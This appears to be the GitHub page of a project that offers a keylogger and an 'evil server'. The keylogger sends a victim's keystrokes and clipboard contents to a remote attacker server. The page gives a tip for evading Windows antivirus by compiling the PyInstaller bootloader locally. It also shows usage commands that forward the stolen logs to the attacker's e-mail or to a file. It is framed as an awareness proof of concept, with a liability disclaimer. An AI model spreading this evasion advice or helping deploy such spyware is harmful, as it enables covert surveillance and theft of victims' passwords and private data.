Skip to content

POC of a Advanced keylogger and covert channel - Remotely receiving victim's keystrokes and clipboard data. emulating an illegal covert channel between the victim and the attacker

License

Notifications You must be signed in to change notification settings

Jsmoreira02/Keylogger-Evil_Server

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

34 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

272844130-8c3b2b16-ae6d-467b-82a3-0e8c0b89c46a-removebg-preview

Evil keylogger server (Covert Channel)

  • Feel free to modify it as you see fit and it can be improved in many ways to suit your needs.

This project focuses on a malicious server that remotely receives keyboard logs and data saved on the victim's clipboard, emulating an illegal covert channel between the victim and the attacker. When the victim runs the keylogger, the first thing it will do is connect to the attacker's remote server and send the logs in real time. It has been carefully designed to present the keyboard logs in the most user-friendly way possible.

(Remember to add your local or proxy IP address in the keylogger script)

Evading the antivirus (Windows 10/11):

Simple technique: Compile the PyInstaller bootloader locally using Microsoft C/C++ compiler and then use pyinstaller to compile the keylogger code.

Optionals

Send the keyboard logs to the attacker's e-mail address

./app.py 192.168.32.34 -e smtp.gmail.com

Peek 12-01-2024 00-33

Write the keystroke logs to a file

./app.py 192.168.18.20 -f keylogs.txt

Peek 12-01-2024 00-34

Warning:

I am not responsible for any illegal use or damage caused by this tool. It primarily serves as a proof of concept and is intended to raise awareness about cybersecurity

About

POC of a Advanced keylogger and covert channel - Remotely receiving victim's keystrokes and clipboard data. emulating an illegal covert channel between the victim and the attacker

Topics

Resources

License

Stars

Watchers

Forks